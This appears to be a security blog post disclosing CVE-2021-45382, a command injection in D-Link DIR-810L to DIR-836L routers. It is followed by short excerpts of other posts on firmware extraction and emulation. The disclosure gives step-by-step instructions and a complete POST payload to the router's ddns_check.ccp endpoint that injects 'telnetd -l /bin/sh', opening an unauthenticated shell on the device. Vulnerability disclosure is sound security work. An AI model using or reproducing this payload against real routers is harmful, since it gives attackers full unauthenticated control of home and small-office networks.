CVE-2021-45382 D-Link Unauthenticated Remote Command Execution Vulnerability

 Introduction

A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions of D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via ddnshostname and ddnusername parameters in POST request to ddns_check.ccp.

Exploit

Open Firefox browser and enable web developer tools by going to Menu > More tools > Web Developer Tools.

Select Network tab in Web Developer Tools window.

Open management URL of the router. Eg. http://192.168.0.1

Select any request in the Web Developer Tools and click Resend > Edit and Resend option.

Modify HTTP method to POST and URL to /ddns_check.ccp

Set the request data to ccp_act=doCheck&ddnsHostName=;telnetd -l /bin/sh;&ddnsUsername=a&ddnsPassword=b

Here the injected command "telnetd -l /bin/sh" starts telnet service, which can be used to interact with router's OS without any authentication. 

Command injection can be performed using ddnsHostName or ddnsUsername parameter.

Video



Comments

Post a Comment

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Image
Extract Cramfs Check the endianness of the Cramfs file: file cramfs  This is a big endian file. Convert cramfs  file to little endian file cramfs_le using cramfsswap. cramfsswap cramfs cramfs_le Extract the little endian file  cramfs_le to folder fs using fsck.cramfs. sudo fsck.cramfs --extract=fs cramfs_le Create Cramfs Use mkfs.cramfs to create Cramfs file system from the contents of folder fs .To create a little endian file system: sudo mkfs.cramfs fs cramfs_new For big endian Cramfs file system: sudo mkfs.cramfs -N big fs cramfs_new Video
Read more

Dump memory to file from U-Boot console using Memory Display (md) log

Image
 Introduction Dump firmware or other contents from memory of a device with U-Boot bootloader to a file by converting output of memory display (md) command to binary image.  Steps 1. Connect to U-Boot console using picocom and save all outputs in a log file using commad given below. Here the output is saved to log file named 'mdb.log'. sudo picocom /dev/ttyUSB0 --baud 115200 --logfile mdb.log 2. Display the contents of the memory using command: md.b <address> <length> Figure below shows the command to display memory contents from address 0x400000000 and of length 0x20000 (128KB) . The data in this example corresponds to a jffs2 file system. 3. Once the execution completes, edit the log file and remove everything other than md.b output. 4. Clone the github project uboot-mdb-dump.git git clone https://github.com/gmbnomis/uboot-mdb-dump.git 5. Generate the binary image file 'output.bin' from log file 'mdb.log'. python3 uboot-mdb-dump/uboot_mdb_to_image.p
Read more

Firmadyne Installation & Emulation of Firmware

Image
 Introduction Firmadyne can be used to perform emulation and analysis of Linux based firmware. Installation Install Ubuntu 18.04 LTS and upgrade all packages: sudo apt update sudo apt upgrade Install and configure other packages: sudo apt-get install busybox-static fakeroot git dmsetup kpartx netcat-openbsd nmap python3-psycopg2 snmp uml-utilities util-linux vlan python3-pip python3-magic sudo update-alternatives --install /usr/bin/python python /usr/bin/python3 10 git clone --recursive https://github.com/firmadyne/firmadyne.git git clone https://github.com/ReFirmLabs/binwalk.git cd binwalk sudo ./deps.sh sudo python ./setup.py install cd .. sudo apt-get install postgresql sudo -u postgres createuser -P firmadyne Give firmadyne as password. sudo -u postgres createdb -O firmadyne firmware sudo -u postgres psql -d firmware < ./firmadyne/database/schema cd firmadyne ./download.sh sudo apt-get install qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils nano firmadyne.config Unco
Read more